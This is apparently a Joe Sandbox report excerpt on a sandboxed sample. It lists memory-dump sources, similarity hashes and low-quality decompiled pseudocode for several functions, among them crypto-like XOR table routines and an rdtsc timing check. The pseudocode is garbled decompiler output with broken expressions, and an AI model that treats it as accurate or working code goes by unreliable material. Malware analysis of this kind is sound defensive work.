
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b6fa9428165563249f9a3c0272a94dd9ce0bae7418846e6a13d8f6facb968b46
                                                                                                                            • Instruction ID: 881fc2a9a89b0b6d28e77938418c2ed8779f54d30fb536fd54ce228c2f0db59e
                                                                                                                            • Opcode Fuzzy Hash: b6fa9428165563249f9a3c0272a94dd9ce0bae7418846e6a13d8f6facb968b46
                                                                                                                            • Instruction Fuzzy Hash: 29716C33604E44C2EF618B21EC4835E63A1F748BA6F206126FA4943F98DB38C456CB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0131C200 Relevance: .2, Instructions: 156COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 38%
                                                                                                                            			E0131C200(signed int __eax, void* __ebx, void* __edi, signed int* __rax, long long __rbp, unsigned long long __r8, void* __r11, void* __r14, long long _a8) {
				char _v8;
				long long _v16;
				signed int _t26;
				void* _t28;
				signed int _t29;
				intOrPtr _t34;
				void* _t35;
				void* _t36;
				unsigned long long _t41;
				unsigned long long _t43;
				unsigned long long _t47;
				void* _t54;
				intOrPtr _t59;
				void* _t60;
				long long _t62;
				void* _t64;
				void* _t65;
				unsigned long long _t66;
				void* _t69;
				unsigned long long _t74;
				void* _t76;
				unsigned long long _t77;
				void* _t80;
				intOrPtr _t82;
				intOrPtr _t83;
				unsigned long long _t86;
				signed int _t89;
				char* _t91;
				void* _t93;
				unsigned long long _t96;
				unsigned long long _t97;
				intOrPtr _t101;
				void* _t103;
				long long _t107;
				void* _t108;
				void* _t109;
				void* _t110;

				L0:
				while(1) {
					L0:
					_t109 = __r14;
					_t108 = __r11;
					_t96 = __r8;
					_t28 = __ebx;
					_t26 = __eax;
					if(_t93 >  *((intOrPtr*)(__r14 + 0x10))) {
						break;
					}
					L32:
					_a8 = __rax;
					asm("movsd [esp+0x10], xmm0");
					E01356200(_t64, __rbp);
					asm("movsd xmm0, [esp+0x10]");
				}
				L1:
				_v8 = __rbp;
				_t91 =  &_v8;
				_t29 =  *__rax;
				if(_t29 < 0) {
					_t62 = __rax;
					_t65 = 0xffffffff;
				} else {
					_t89 = __rax[0x2a];
					_t74 = (__rax[0x24] + _t89 + __rax[0x28]) * _t29 >> 1;
					_t62 = __rax;
					_t26 = __eax * _t74;
					_t65 = (_t74 >> 5) + _t89;
				}
				_t59 =  *((intOrPtr*)(_t62 + 8));
				_t34 =  *0x147b6fc; // 0x80000000
				if(_t34 != 0x80000000) {
					_t59 =  <  ?  *((intOrPtr*)(_t62 + 0x78)) + 0x100000 : _t59;
				}
				_t83 =  *((intOrPtr*)(_t62 + 0xa8));
				_t76 = _t65;
				_t66 = _t65 - _t83;
				_t41 = _t66;
				if(_t41 < 0) {
					_t97 = _t66;
					_t96 = _t97 >> 1;
					asm("xorps xmm0, xmm0");
					asm("repne dec eax");
					asm("addsd xmm0, xmm0");
					_t66 = _t97;
				} else {
					asm("xorps xmm0, xmm0");
					asm("repne dec eax");
				}
				asm("movsd xmm1, [0xfa1f3]");
				asm("mulsd xmm0, xmm1");
				asm("movsd xmm1, [0xfa257]");
				asm("ucomisd xmm1, xmm0");
				if(_t41 <= 0) {
					asm("subsd xmm0, xmm1");
					asm("repne dec esp");
					asm("dec ecx");
				} else {
					asm("repne dec esp");
				}
				_t60 =  <  ? _t96 + _t83 : _t59;
				_t43 = _t66;
				if(_t43 < 0) {
					_t66 = _t66 >> 1;
					r8d = r8d & 0x00000001;
					asm("xorps xmm0, xmm0");
					asm("repne dec ecx");
					asm("addsd xmm0, xmm0");
				} else {
					asm("xorps xmm0, xmm0");
					asm("repne dec eax");
				}
				asm("movsd xmm2, [0xfa1a0]");
				asm("mulsd xmm0, xmm2");
				asm("ucomisd xmm1, xmm0");
				if(_t43 <= 0) {
					asm("subsd xmm0, xmm1");
					asm("repne dec eax");
					asm("dec eax");
				} else {
					asm("repne dec eax");
				}
				_t101 =  *((intOrPtr*)(_t62 + 8));
				_t103 = _t76;
				_t77 = _t76 - _t101;
				if(_t103 > _t101 && _t66 < _t77) {
					_t66 = _t77;
				}
				_t69 =  >  ? _t60 : _t66 + _t83;
				asm("movsd xmm0, [0xfa14e]");
				asm("mulsd xmm0, [ecx+0x20]");
				_t86 =  *((intOrPtr*)(_t62 + 0x88)) +  *((intOrPtr*)(_t62 + 0x90)) +  *((intOrPtr*)(_t62 + 0xa0));
				_t47 = _t86;
				if(_t47 < 0) {
					_t86 = _t86 >> 1;
					asm("xorps xmm2, xmm2");
					asm("repne dec eax");
					asm("addsd xmm2, xmm2");
				} else {
					asm("xorps xmm2, xmm2");
					asm("repne dec eax");
				}
				asm("movsd xmm3, [0xfa12d]");
				asm("mulsd xmm3, xmm0");
				asm("mulsd xmm2, xmm3");
				asm("ucomisd xmm1, xmm2");
				if(_t47 <= 0) {
					asm("subsd xmm2, xmm1");
					asm("repne dec eax");
					asm("dec eax");
				} else {
					asm("repne dec eax");
				}
				_t80 = _t103;
				_t105 =  >  ? _t60 : _t103 - _t86;
				_t106 =  >  ? _t60 :  >  ? _t60 : _t103 - _t86;
				_t107 =  <  ? _t69 :  >  ? _t60 :  >  ? _t60 : _t103 - _t86;
				 *((long long*)(_t62 + 0x18)) = _t107;
				_t81 =  <  ? _t107 : _t80;
				_t19 = _t62 + 0x68;
				_t20 =  <  ? _t107 : _t80;
				_t82 =  *_t19;
				 *_t19 =  <  ? _t107 : _t80;
				if( *0x14814f0 != 0) {
					_v16 = _t62;
					_t26 = E0134D180(_t28, _t35, _t36, _t54, _t82, _t91, _t109, _t110);
					_t62 = _v16;
				}
				if( *0x14cf32c != 0) {
					_t26 = E0131B680(_t26, _t62, _t62, _t108);
				}
				return _t26;
			}








































                                                                                                                            0x0131c200
                                                                                                                            0x0131c200
                                                                                                                            0x0131c200
                                                                                                                            0x0131c200
                                                                                                                            0x0131c200
                                                                                                                            0x0131c200
                                                                                                                            0x0131c200
                                                                                                                            0x0131c200
                                                                                                                            0x0131c204
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0131c445
                                                                                                                            0x0131c445
                                                                                                                            0x0131c44a
                                                                                                                            0x0131c450
                                                                                                                            0x0131c45a
                                                                                                                            0x0131c45a
                                                                                                                            0x0131c20a
                                                                                                                            0x0131c20e
                                                                                                                            0x0131c213
                                                                                                                            0x0131c218
                                                                                                                            0x0131c21c
                                                                                                                            0x0131c25c
                                                                                                                            0x0131c25f
                                                                                                                            0x0131c21e
                                                                                                                            0x0131c22c
                                                                                                                            0x0131c240
                                                                                                                            0x0131c243
                                                                                                                            0x0131c250
                                                                                                                            0x0131c257
                                                                                                                            0x0131c257
                                                                                                                            0x0131c266
                                                                                                                            0x0131c26b
                                                                                                                            0x0131c277
                                                                                                                            0x0131c287
                                                                                                                            0x0131c287
                                                                                                                            0x0131c28b
                                                                                                                            0x0131c292
                                                                                                                            0x0131c295
                                                                                                                            0x0131c298
                                                                                                                            0x0131c29b
                                                                                                                            0x0131c2a7
                                                                                                                            0x0131c2b0
                                                                                                                            0x0131c2b6
                                                                                                                            0x0131c2b9
                                                                                                                            0x0131c2be
                                                                                                                            0x0131c2c2
                                                                                                                            0x0131c29d
                                                                                                                            0x0131c29d
                                                                                                                            0x0131c2a0
                                                                                                                            0x0131c2a0
                                                                                                                            0x0131c2c5
                                                                                                                            0x0131c2cd
                                                                                                                            0x0131c2d1
                                                                                                                            0x0131c2d9
                                                                                                                            0x0131c2dd
                                                                                                                            0x0131c2e6
                                                                                                                            0x0131c2ea
                                                                                                                            0x0131c2ef
                                                                                                                            0x0131c2df
                                                                                                                            0x0131c2df
                                                                                                                            0x0131c2df
                                                                                                                            0x0131c2fa
                                                                                                                            0x0131c300
                                                                                                                            0x0131c303
                                                                                                                            0x0131c312
                                                                                                                            0x0131c315
                                                                                                                            0x0131c31c
                                                                                                                            0x0131c31f
                                                                                                                            0x0131c324
                                                                                                                            0x0131c305
                                                                                                                            0x0131c305
                                                                                                                            0x0131c308
                                                                                                                            0x0131c308
                                                                                                                            0x0131c328
                                                                                                                            0x0131c330
                                                                                                                            0x0131c334
                                                                                                                            0x0131c338
                                                                                                                            0x0131c342
                                                                                                                            0x0131c346
                                                                                                                            0x0131c34b
                                                                                                                            0x0131c33a
                                                                                                                            0x0131c33a
                                                                                                                            0x0131c33a
                                                                                                                            0x0131c350
                                                                                                                            0x0131c354
                                                                                                                            0x0131c357
                                                                                                                            0x0131c35d
                                                                                                                            0x0131c365
                                                                                                                            0x0131c365
                                                                                                                            0x0131c36e
                                                                                                                            0x0131c372
                                                                                                                            0x0131c37a
                                                                                                                            0x0131c38d
                                                                                                                            0x0131c394
                                                                                                                            0x0131c397
                                                                                                                            0x0131c3a6
                                                                                                                            0x0131c3af
                                                                                                                            0x0131c3b2
                                                                                                                            0x0131c3b7
                                                                                                                            0x0131c399
                                                                                                                            0x0131c399
                                                                                                                            0x0131c39c
                                                                                                                            0x0131c39c
                                                                                                                            0x0131c3bb
                                                                                                                            0x0131c3c3
                                                                                                                            0x0131c3c7
                                                                                                                            0x0131c3cb
                                                                                                                            0x0131c3cf
                                                                                                                            0x0131c3d8
                                                                                                                            0x0131c3dc
                                                                                                                            0x0131c3e1
                                                                                                                            0x0131c3d1
                                                                                                                            0x0131c3d1
                                                                                                                            0x0131c3d1
                                                                                                                            0x0131c3e6
                                                                                                                            0x0131c3ef
                                                                                                                            0x0131c3f6
                                                                                                                            0x0131c3fd
                                                                                                                            0x0131c401
                                                                                                                            0x0131c408
                                                                                                                            0x0131c40c
                                                                                                                            0x0131c40c
                                                                                                                            0x0131c40c
                                                                                                                            0x0131c40c
                                                                                                                            0x0131c417
                                                                                                                            0x0131c419
                                                                                                                            0x0131c420
                                                                                                                            0x0131c425
                                                                                                                            0x0131c425
                                                                                                                            0x0131c431
                                                                                                                            0x0131c436
                                                                                                                            0x0131c436
                                                                                                                            0x0131c444

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0ec183325937e8cb6d9e9df1917c09e8e7cc4e5f56fff65d5efc61d485023bbb
                                                                                                                            • Instruction ID: dd6064d0aa322498325c548402094440064fd8c50825ef8dcac034ac520900d2
                                                                                                                            • Opcode Fuzzy Hash: 0ec183325937e8cb6d9e9df1917c09e8e7cc4e5f56fff65d5efc61d485023bbb
                                                                                                                            • Instruction Fuzzy Hash: ED5138F2B49F948BDA4B87799114398D216ABA6FC8F14D7219D1A3BF5CD718C1838740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A86D77 Relevance: .1, Instructions: 134COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A86D77(signed int __rdx, intOrPtr _a32, intOrPtr _a40, signed long long _a48, void* _a56, intOrPtr _a136) {
				signed long long _t196;
				signed long long _t197;
				signed long long _t198;
				signed long long _t199;
				signed long long _t200;
				signed long long _t240;
				signed long long _t243;
				signed long long _t246;

				_a32 = _a32 + 1;
				if (_a32 -  *((intOrPtr*)(_a136 + 0x1e0)) >= 0) goto 0xf8a86f9e;
				_a56 = _a56 - 0x10;
				_t196 = _a48 + 0x10;
				_a48 = _t196;
				_t197 = _t196 * 0;
				_a40 =  *((intOrPtr*)(_a56 + _t197));
				_t240 = _a48;
				 *_t240 =  *(0xf8a957a0 + _t197 * 4) ^  *(0xf8a95ba0 + __rdx * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
				_t198 = _t197;
				_a40 =  *((intOrPtr*)(_a56 + _t198));
				_t243 = _a48;
				 *(_t243 + 0x25bf8a957a0) =  *(0xf8a957a0 + _t198 * 4) ^  *(0xf8a95ba0 + _t240 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
				_t199 = _t198 * 2;
				_a40 =  *((intOrPtr*)(_a56 + _t199));
				_t246 = _a48;
				 *(_t246 + 0x4b7f152af40) =  *(0xf8a957a0 + _t199 * 4) ^  *(0xf8a95ba0 + _t243 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
				_t200 = _t199 * 3;
				_a40 =  *((intOrPtr*)(_a56 + _t200));
				 *(_a48 + 0x713e9fc06e0) =  *(0xf8a957a0 + _t200 * 4) ^  *(0xf8a95ba0 + _t246 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
				goto E0000025B25BF8A86D77;
				_a56 = _a56 - 0x10;
				_a48 = _a48 + 0x10;
				 *_a48 =  *_a56;
				_a48 = _a48 + 4;
				_a56 = _a56 + 4;
				 *_a48 =  *_a56;
				_a48 = _a48 + 4;
				_a56 = _a56 + 4;
				 *_a48 =  *_a56;
				_a48 = _a48 + 4;
				_a56 = _a56 + 4;
				 *_a48 =  *_a56;
				return 0;
			}











                                                                                                                            0x25bf8a86d7d
                                                                                                                            0x25bf8a86d93
                                                                                                                            0x25bf8a86da2
                                                                                                                            0x25bf8a86dac
                                                                                                                            0x25bf8a86db0
                                                                                                                            0x25bf8a86dba
                                                                                                                            0x25bf8a86dc6
                                                                                                                            0x25bf8a86e26
                                                                                                                            0x25bf8a86e2b
                                                                                                                            0x25bf8a86e33
                                                                                                                            0x25bf8a86e3f
                                                                                                                            0x25bf8a86e9f
                                                                                                                            0x25bf8a86ea4
                                                                                                                            0x25bf8a86eac
                                                                                                                            0x25bf8a86eb8
                                                                                                                            0x25bf8a86f18
                                                                                                                            0x25bf8a86f1d
                                                                                                                            0x25bf8a86f25
                                                                                                                            0x25bf8a86f31
                                                                                                                            0x25bf8a86f96
                                                                                                                            0x25bf8a86f99
                                                                                                                            0x25bf8a86fa7
                                                                                                                            0x25bf8a86fb5
                                                                                                                            0x25bf8a86fc6
                                                                                                                            0x25bf8a86fd1
                                                                                                                            0x25bf8a86fdf
                                                                                                                            0x25bf8a86ff0
                                                                                                                            0x25bf8a86ffb
                                                                                                                            0x25bf8a87009
                                                                                                                            0x25bf8a8701a
                                                                                                                            0x25bf8a87025
                                                                                                                            0x25bf8a87033
                                                                                                                            0x25bf8a87044
                                                                                                                            0x25bf8a8704d

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 67a9ee3c501cbda97f38559516458ff95ca4b59fcfc23f289382419eb93840ad
                                                                                                                            • Instruction ID: c0b1d7821590dfb04919f9717afbaa2afcc2052bcb81f61b2ae8735b372046ce
                                                                                                                            • Opcode Fuzzy Hash: 67a9ee3c501cbda97f38559516458ff95ca4b59fcfc23f289382419eb93840ad
                                                                                                                            • Instruction Fuzzy Hash: 1B612AB62149508BDB14CB08E89562AB7E1F3CC7D5F94121AF38E87B68DB3CD544CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0130B8E0 Relevance: .1, Instructions: 100COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 25cbce2bf9696ae3ec5ba7b698f64a8dfc06785eb23abb9183bb8660141dc412
                                                                                                                            • Instruction ID: c543b9fef61779465e2b600d139fae34742e9e9513c10a2932b5191c7429c9b1
                                                                                                                            • Opcode Fuzzy Hash: 25cbce2bf9696ae3ec5ba7b698f64a8dfc06785eb23abb9183bb8660141dc412
                                                                                                                            • Instruction Fuzzy Hash: 7E2136B2A65E484FCA43DB3A9410351D20BBF967D0F58CB22AE1B777A5E728D0D28200
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 013582C0 Relevance: .0, Instructions: 11COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 50%
                                                                                                                            			E013582C0(void* __eax, void* __rax, signed long long __rdx, long long _a8) {
				void* _t2;
				void* _t5;
				signed long long _t7;

				_t7 = __rdx;
				_t5 = __rax;
				_t2 = __eax;
				if( *0x14cfaeb != 1) {
					asm("mfence");
					asm("lfence");
					asm("rdtsc");
				} else {
					asm("rdtscp");
				}
				_a8 = _t5 + (_t7 << 0x20);
				return _t2;
			}






                                                                                                                            0x013582c0
                                                                                                                            0x013582c0
                                                                                                                            0x013582c0
                                                                                                                            0x013582c7
                                                                                                                            0x013582d9
                                                                                                                            0x013582dc
                                                                                                                            0x013582df
                                                                                                                            0x013582c9
                                                                                                                            0x013582c9
                                                                                                                            0x013582c9
                                                                                                                            0x013582d3
                                                                                                                            0x013582d8

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 991984f95485c17084124b5fca27ac93b5333b5c799aa0c9dc4330b907498c61
                                                                                                                            • Instruction ID: 9fb73dc41e41b73858047269767be53817884bbde07ebba4046fa1cf55406585
                                                                                                                            • Opcode Fuzzy Hash: 991984f95485c17084124b5fca27ac93b5333b5c799aa0c9dc4330b907498c61
                                                                                                                            • Instruction Fuzzy Hash: 98C02BF0907FC628FF90C30971003557DC68F047CCD80C0C0924D00B25D62D82844204
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A77FC4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238stringCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 66%
                                                                                                                            			E0000025B25BF8A77FC4(void* __edx, long long __rbx, signed int __rcx, long long __rdi, long long __rsi, long long __rbp, signed int __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t22;
				char* _t27;
				void* _t31;
				void* _t32;
				void* _t34;
				intOrPtr _t42;
				void* _t44;
				void* _t47;
				long long _t69;
				int _t71;
				long long _t73;
				int _t91;
				long long _t101;
				long long _t103;
				char* _t110;
				char* _t112;
				int _t114;

				_t47 = __edx;
				if ( *__r8 == 1) goto 0xf8a78224;
				if ( *__r8 == 2) goto 0xf8a77fe0;
				goto 0xf8a78310;
				asm("int3");
				asm("int3");
				asm("int3");
				_t69 = _t103;
				 *((long long*)(_t69 + 8)) = __rbx;
				 *((long long*)(_t69 + 0x10)) = __rbp;
				 *((long long*)(_t69 + 0x18)) = __rsi;
				 *((long long*)(_t69 + 0x20)) = __rdi;
				r15d = 0;
				r14d = __edx;
				E0000025B25BF8A7B50C(_t22, __rbx, __rcx);
				_t5 = _t114 + 1; // 0x1
				r12d = _t5;
				_t101 = _t69;
				if ( *0xf8aa1b80 != _t114) goto 0xf8a780e6;
				if ( *((intOrPtr*)(__rcx + (__rcx | 0xffffffff) + 1)) != r15b) goto 0xf8a7802b;
				malloc(_t114);
				 *0xf8aa1b80 = _t69;
				if ( *((intOrPtr*)(__rcx + (__r8 | 0xffffffff) + 1)) != r15b) goto 0xf8a78047;
				E0000025B25BF8A7A840(_t47,  *((intOrPtr*)(__rcx + (__r8 | 0xffffffff) + 1)) - r15b, _t69, __rcx, (__r8 | 0xffffffff) + 1 + _t110);
				 *0xf8aa21d8 = r15d;
				strtok(_t112);
				if (_t69 == 0) goto 0xf8a780a8;
				 *((long long*)(0xf8aa21e0 +  *0xf8aa21d8 * 8)) = _t69;
				 *0xf8aa21d8 = _t47 + r12d;
				_t27 = strtok(_t110);
				goto 0xf8a7807f;
				 *0xf8aa21dc = r15d;
				E0000025B25BF8A7B50C(_t27, __rbx,  *0xf8aa1b80);
				r9d =  *((intOrPtr*)(__r8 + 0xc));
				r8d =  *((intOrPtr*)(__r8 + 8));
				 *0xf8a9c430 =  *((intOrPtr*)(__r8 + 4));
				 *0xf8aa2820 = _t69;
				 *0xf8aa2828 = _t114;
				 *0xf8a9c438 = r9d;
				 *0xf8a9c434 = r8d;
				goto 0xf8a78108;
				_t91 =  *0xf8aa2828;
				r9d =  *0xf8a9c438; // 0x0
				r8d =  *0xf8a9c434; // 0x0
				if (r14d == 0) goto 0xf8a7815a;
				if (r9d - 0xffffffff <= 0) goto 0xf8a78129;
				 *0xf8aa1b8c =  *0xf8aa1b8c + r12d;
				_t34 =  >  ? r12d : r15d;
				if (r8d - 0xffffffff <= 0) goto 0xf8a78171;
				if (_t91 == 0) goto 0xf8a78144;
				_t71 = r8d + _t91;
				if (_t101 - _t71 <= 0) goto 0xf8a78171;
				goto 0xf8a78171;
				_t31 = E0000025B25BF8A7B50C( *0xf8aa1b8c + r12d, __rbx,  *0xf8aa1b80);
				_t42 =  *0xf8a9c430; // 0x0
				 *0xf8aa2828 = _t71;
				goto 0xf8a78171;
				if ( *0xf8aa1b88 != r15d) goto 0xf8a78171;
				 *0xf8aa2828 = _t114;
				 *0xf8aa1b8c = r15d;
				if (_t42 - 0xffffffff <= 0) goto 0xf8a78195;
				if (r12d != 0) goto 0xf8a78199;
				if ( *0xf8aa1b88 != r15d) goto 0xf8a781f2;
				_t73 = _t42 +  *0xf8aa2820;
				if (_t101 - _t73 <= 0) goto 0xf8a781de;
				if (r12d == 0) goto 0xf8a781d5;
				 *0xf8aa1b8c = r15d;
				 *0xf8aa1b88 = r15d;
				_t44 =  *0xf8aa21dc + 2;
				 *0xf8aa2828 = _t114;
				_t45 =  >=  ? r15d : _t44;
				 *0xf8aa21dc =  >=  ? r15d : _t44;
				_t32 = E0000025B25BF8A7B50C(_t31, __rbx,  *0xf8aa1b80);
				 *0xf8aa2820 = _t73;
				if ( *0xf8aa1b88 != r15d) goto 0xf8a781f2;
				 *0xf8aa1b88 = r12d;
				goto 0xf8a78205;
				 *0xf8aa1b88 = r15d;
				return _t32;
			}




















                                                                                                                            0x25bf8a77fc4
                                                                                                                            0x25bf8a77fc8
                                                                                                                            0x25bf8a77fd2
                                                                                                                            0x25bf8a77fd8
                                                                                                                            0x25bf8a77fdd
                                                                                                                            0x25bf8a77fde
                                                                                                                            0x25bf8a77fdf
                                                                                                                            0x25bf8a77fe0
                                                                                                                            0x25bf8a77fe3
                                                                                                                            0x25bf8a77fe7
                                                                                                                            0x25bf8a77feb
                                                                                                                            0x25bf8a77fef
                                                                                                                            0x25bf8a78000
                                                                                                                            0x25bf8a78008
                                                                                                                            0x25bf8a7800e
                                                                                                                            0x25bf8a7801a
                                                                                                                            0x25bf8a7801a
                                                                                                                            0x25bf8a7801e
                                                                                                                            0x25bf8a78021
                                                                                                                            0x25bf8a78032
                                                                                                                            0x25bf8a78037
                                                                                                                            0x25bf8a78040
                                                                                                                            0x25bf8a7804e
                                                                                                                            0x25bf8a78059
                                                                                                                            0x25bf8a7806c
                                                                                                                            0x25bf8a78073
                                                                                                                            0x25bf8a78084
                                                                                                                            0x25bf8a7808d
                                                                                                                            0x25bf8a78094
                                                                                                                            0x25bf8a780a1
                                                                                                                            0x25bf8a780a6
